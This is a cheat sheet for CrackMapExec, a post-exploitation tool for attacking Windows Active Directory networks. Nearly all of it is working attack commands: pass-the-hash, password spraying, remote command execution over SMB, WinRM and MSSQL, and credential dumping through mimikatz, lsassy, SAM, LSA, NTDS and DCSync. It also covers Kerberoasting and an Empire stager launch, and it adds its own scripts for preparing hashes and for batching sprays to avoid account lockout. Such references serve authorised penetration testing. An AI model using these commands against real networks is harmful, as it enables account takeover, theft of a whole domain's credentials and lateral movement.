
CrackMapExec Cheat Sheet


Overview

CrackMapExec (CME) is a post-exploitation tool for penetration tests and red team operations in Windows/Active Directory environments. It is often described as the "Swiss Army knife" of network penetration testing: it enumerates hosts, validates credentials and executes commands over several protocols, and records everything it learns in a local database.

Warning: CrackMapExec is a security testing tool and must only be used in environments where you have explicit, written permission to do so.

Installation

Using pipx (recommended)

```bash
# Install pipx if it is not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec
```

On Kali Linux

```bash
sudo apt update
sudo apt install -y crackmapexec
```

From GitHub

```bash
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
```

Using Docker

```bash
docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec
```

Basic usage

General syntax

```bash
crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]
```

Supported protocols

  • smb: Server Message Block
  • winrm: Windows Remote Management
  • ldap: Lightweight Directory Access Protocol
  • mssql: Microsoft SQL Server
  • ssh: Secure Shell
  • rdp: Remote Desktop Protocol
  • ftp: File Transfer Protocol

Target specification

Targets are positional and may be repeated; separate several targets with spaces (the target argument accepts multiple values, not a comma-separated list).

```bash
# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100 192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file (one host, range or CIDR per line)
crackmapexec smb targets.txt
```

Authentication methods

Username and password

`-u` and `-p` each take one or more values separated by spaces; a value that names an existing file is read line by line. Without `--no-bruteforce` every username is tried with every password.

```bash
# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' 'Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt
```

Pass-the-Hash

```bash
# NTLM hash in LM:NT form. aad3b435b51404eeaad3b435b51404ee is the LM hash of the
# empty string (LM storage disabled); 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT
# hash of an empty password, so this particular value only works on accounts with
# no password set. Substitute the NT hash you actually recovered.
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes (space separated, like -p)
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file (one hash per line)
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt
```
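Hashes handed over from a dump are frequently in mixed case, with or without the LM half, and sometimes belong to an account with an empty password. The following helper is an added example written for this page, not part of CrackMapExec: it normalises a hash into the `LM:NT` form that `-H` expects, rejects malformed input, and warns when the NT part is the well-known empty-password hash. The sample hash `8846f7eaee8fb117ad06bdd830b7586c` is just an arbitrary 32-hex-digit value used to exercise the functions.

```bash
#!/usr/bin/env bash
# Added example (not CrackMapExec code): prepare and sanity-check a hash for -H.

EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'   # LM hash of the empty string
EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty string

# normalize_ntlm HASH -> prints "lm:nt" in lower case; returns 1 on malformed input.
# Accepts either "NT" (LM half is filled in) or "LM:NT".
normalize_ntlm() {
    local raw lm nt
    raw=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$raw" in
        *:*) lm=${raw%%:*}; nt=${raw#*:} ;;
        *)   lm=$EMPTY_LM;  nt=$raw ;;
    esac
    case "$lm$nt" in
        *[!0-9a-f]*) return 1 ;;      # anything but hex digits is not a hash
    esac
    [ ${#lm} -eq 32 ] && [ ${#nt} -eq 32 ] || return 1
    printf '%s:%s\n' "$lm" "$nt"
}

# is_empty_password LM:NT -> succeeds when the NT half hashes the empty password
is_empty_password() {
    [ "${1#*:}" = "$EMPTY_NT" ]
}

# pth_cmd USER HASH TARGET -> prints the crackmapexec invocation to run
pth_cmd() {
    local user=$1 hash target=$3
    hash=$(normalize_ntlm "$2") || { echo "bad hash: $2" >&2; return 1; }
    if is_empty_password "$hash"; then
        echo "warning: NT hash is that of an empty password" >&2
    fi
    printf "crackmapexec smb %s -u %s -H '%s'\n" "$target" "$user" "$hash"
}

# Usage: pth_cmd administrator 8846f7eaee8fb117ad06bdd830b7586c 192.168.1.100
```

Run the printed command yourself rather than piping it into `sh`; the point of the helper is to catch a truncated or empty-password hash before the attempt is logged on the target.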

Local authentication

```bash
# Authenticate against the local SAM instead of the domain
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth
```

Domain authentication

```bash
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN
```

SMB protocol commands

Basic enumeration

```bash
# List shares and the access level (READ/WRITE) of the supplied account
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get the domain password policy (do this before any password spraying)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing; hosts with signing not required are written to the file
# as candidates for NTLM relay (no credentials needed)
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
```

Command execution

```bash
# Execute a command via cmd.exe (requires local admin on the target)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute a PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'
```

File operations

Remote paths for `--get-file` and `--put-file` are relative to the share selected with `--share` (default `C$`), not full drive paths; `--pattern` matches a substring of the file name, not a glob.

```bash
# Find files in a share whose name contains "txt"
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern txt

# Download file (remote path, then local path)
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --share C$ --get-file '\temp\file.txt' /tmp/file.txt

# Upload file (local path, then remote path)
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --share C$ --put-file /tmp/file.txt '\temp\file.txt'
```

WinRM protocol commands

Basic enumeration

```bash
# Check WinRM access (a successful login reports Pwn3d! because WinRM implies
# remote command execution for that account)
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'
```

Command execution

```bash
# Execute a command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute a PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'
```

LDAP protocol commands

Basic enumeration

```bash
# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get the domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts
```

Advanced enumeration

```bash
# Read the MachineAccountQuota (how many computer accounts a plain user may add)
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq

# Find accounts with unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Find accounts with constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Find AS-REP roastable users (pre-authentication disabled) and save the hashes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Find Kerberoastable users (accounts with an SPN) and save the TGS hashes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt
```

MSSQL protocol commands

Basic enumeration

`sa` is a SQL Server login, not a Windows account, so it must be used with `--local-auth`; without the flag CME attempts Windows authentication.

```bash
# Check MSSQL access with the SQL login sa
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' --local-auth

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases'
```

Command execution

```bash
# Execute an OS command (uses xp_cmdshell, which CME enables if the login is sysadmin)
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' --local-auth -x 'whoami'

# Execute a query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' --local-auth -q 'SELECT @@version'
```

Module usage

Module management

Modules are protocol-specific, so a protocol must always be given on the command line.

```bash
# List available modules for a protocol
crackmapexec smb -L

# Show a module's options
crackmapexec smb -M mimikatz --options

# Use a module with options
crackmapexec smb <target> -u <user> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2
```

Common modules

Mimikatz

```bash
# Dump credentials from LSASS
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get the SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# DCSync the krbtgt account (requires replication rights, e.g. Domain Admin)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'
```

Empire

```bash
# Launch an Empire stager for the given listener
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http
```

PowerView

```bash
# Run a PowerView command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'
```

BloodHound

```bash
# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All
```

Lsassy

```bash
# Dump credentials from LSASS using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy
```

Enum_DNS

```bash
# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns
```

goad

```bash
# Get objects and attributes from the domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad
```

Advanced techniques

Password spraying

Check the lockout threshold and the counter-reset window with `--pass-pol` first: `--jitter` only spreads attempts over time, it does not prevent a lockout once the threshold is reached within the observation window. `--no-bruteforce` pairs users and passwords line by line instead of trying every combination.

```bash
# Spray a single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Try multiple passwords against a single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with a random delay between attempts, keep going after the first hit,
# and give up on a host after one failure to limit noise
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10
```
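The safe number of passwords per spray round follows directly from the policy that `--pass-pol` prints. The script below is an added example written for this page, not part of CrackMapExec: it parses the `Account Lockout Threshold` and `Reset Account Lockout Counter` lines, keeps two attempts in reserve, and turns a list of candidate passwords into batched `crackmapexec` invocations separated by a wait for the counter to reset. `SAMPLE_PASS_POL` is a constructed sample laid out like CME's `--pass-pol` output; the parser assumes the reset window is reported in minutes, which is what CME prints for the common case.

```bash
#!/usr/bin/env bash
# Added example (not CrackMapExec code): lockout-aware spray batching from --pass-pol output.

# Constructed sample of `crackmapexec smb DC -u USER -p PASS --pass-pol` output
SAMPLE_PASS_POL='SMB  192.168.1.10  445  DC01  [+] Dumping password info for domain: CORP
SMB  192.168.1.10  445  DC01  Minimum password length: 8
SMB  192.168.1.10  445  DC01  Password history length: 24
SMB  192.168.1.10  445  DC01  Maximum password age: 41 days 23 hours 53 minutes
SMB  192.168.1.10  445  DC01  Minimum password age: 1 day 4 minutes
SMB  192.168.1.10  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  192.168.1.10  445  DC01  Locked Account Duration: 30 minutes
SMB  192.168.1.10  445  DC01  Account Lockout Threshold: 5
SMB  192.168.1.10  445  DC01  Forced Log off Time: Not Set'

# policy_field LABEL (stdin: policy text) -> value after "LABEL:" on the first matching line
policy_field() {
    sed -n "s/.*$1: *//p" | head -n 1
}

# lockout_threshold POLICY -> bad-password count that locks the account; 0 when disabled ("None")
lockout_threshold() {
    local v
    v=$(printf '%s\n' "$1" | policy_field 'Account Lockout Threshold')
    case "$v" in
        ''|None*) echo 0 ;;
        *) printf '%s\n' "$v" | sed 's/[^0-9]//g' ;;
    esac
}

# reset_window_minutes POLICY -> minutes until the bad-password counter resets (assumes "N minutes")
reset_window_minutes() {
    printf '%s\n' "$1" | policy_field 'Reset Account Lockout Counter' | sed 's/[^0-9]//g'
}

# spray_budget POLICY -> passwords per user per reset window, keeping two attempts in
# reserve for the user's own typos; "unlimited" when lockout is disabled
spray_budget() {
    local t
    t=$(lockout_threshold "$1")
    if [ "$t" -eq 0 ]; then
        echo unlimited
    elif [ "$t" -le 2 ]; then
        echo 1
    else
        echo $((t - 2))
    fi
}

# spray_plan POLICY TARGET USERFILE PASSWORD... -> one crackmapexec line per batch,
# with a sleep for the reset window between batches
spray_plan() {
    local policy=$1 target=$2 users=$3 budget window total i=0 n=0 batch=''
    shift 3
    total=$#
    budget=$(spray_budget "$policy")
    window=$(reset_window_minutes "$policy")
    [ "$budget" = unlimited ] && budget=$total
    for pw in "$@"; do
        batch="$batch '$pw'"
        i=$((i + 1)); n=$((n + 1))
        if [ "$n" -eq "$budget" ] || [ "$i" -eq "$total" ]; then
            # every user gets at most $budget attempts in this round
            printf 'crackmapexec smb %s -u %s -p%s --continue-on-success\n' "$target" "$users" "$batch"
            batch=''; n=0
            if [ "$i" -lt "$total" ]; then
                printf 'sleep %d  # wait for the lockout counter to reset\n' "$((window * 60))"
            fi
        fi
    done
}

# Usage: spray_plan "$SAMPLE_PASS_POL" 192.168.1.0/24 users.txt 'Spring2023!' 'Summer2023!' 'Autumn2023!' 'Winter2023!'
```

With the sample policy (threshold 5, 30-minute window) the plan tries three passwords per round and sleeps 1800 seconds before the next one. Feed it the real `--pass-pol` output captured from a domain controller, and remember that a fine-grained password policy can impose a stricter threshold on specific groups than the domain default shown here.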

Credential harvesting

All three require local administrator rights on the target; `--ntds` only makes sense against a domain controller.

```bash
# Dump the SAM database (local account hashes)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets (cached credentials, service account passwords)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit from a domain controller (all domain hashes)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds
```

Database

CME records every host, share and credential it sees automatically in a per-protocol SQLite database under `~/.cme/workspaces/<workspace>/`; no flag is needed to enable it. The database is browsed with the `cmedb` shell, and stored credentials can be reused by ID.

```bash
# Open the database shell; the prompt shows the workspace and protocol
cmedb
# cmedb (default)(smb) > hosts      # list hosts seen so far
# cmedb (default)(smb) > creds      # list credentials, with their IDs

# Use credential ID 1 from the database instead of -u/-p
crackmapexec smb 192.168.1.0/24 -id 1
```

Common options

| Option | Description |
| --- | --- |
| `-h, --help` | Show help message and exit |
| `-t THREADS` | Set number of concurrent threads (default: 100) |
| `--timeout TIMEOUT` | Set timeout for connections (default: 5 seconds) |
| `--verbose` | Enable verbose output |
| `--debug` | Enable debug output |
| `--continue-on-success` | Continue authentication attempts even after success |
| `--no-bruteforce` | No bruteforce; pair usernames and passwords line by line |
| `--fail-limit LIMIT` | Number of failed login attempts before giving up on a host |
| `--jitter JITTER` | Add a random delay between authentication attempts (in seconds) |
| `--local-auth` | Authenticate using local accounts instead of domain accounts |
| `-d, --domain DOMAIN` | Domain to authenticate to |
| `--no-output` | Do not display command output |
| `--output-file FILE` | Write output to file |
| `--log` | Enable logging to file (default: ~/.cme/logs/) |

Protocol-specific options

SMB options

| Option | Description |
| --- | --- |
| `--shares` | List available shares |
| `--sessions` | List active sessions |
| `--disks` | List disks |
| `--loggedon-users` | List logged-on users |
| `--users` | List domain users |
| `--groups` | List domain groups |
| `--local-groups` | List local groups |
| `--pass-pol` | Get password policy |
| `--rid-brute [MAX_RID]` | Enumerate users by brute-forcing RIDs |
| `--sam` | Dump SAM hashes |
| `--lsa` | Dump LSA secrets |
| `--ntds` | Dump NTDS.dit |
| `--exec-method {smbexec,wmiexec,mmcexec,atexec}` | Method used to execute commands |

LDAP options

| Option | Description |
| --- | --- |
| `--users` | List domain users |
| `--groups` | List domain groups |
| `--computers` | List domain computers |
| `--domain` | Get domain information |
| `--pass-pol` | Get password policy |
| `--trusts` | Get domain trusts |
| `--asreproast [OUTFILE]` | Get AS-REP roastable users |
| `--kerberoasting [OUTFILE]` | Get Kerberoastable users |
| `--trusted-for-delegation` | Get users/computers with unconstrained delegation |
| `--allowed-to-delegate` | Get users/computers with constrained delegation |

WinRM options

| Option | Description |
| --- | --- |
| `--port [PORT]` | WinRM port (default: 5985) |
| `--ssl` | Use SSL for WinRM |

MSSQL options

| Option | Description |
| --- | --- |
| `--port [PORT]` | MSSQL port (default: 1433) |
| `-q QUERY` | Execute SQL query |

Resources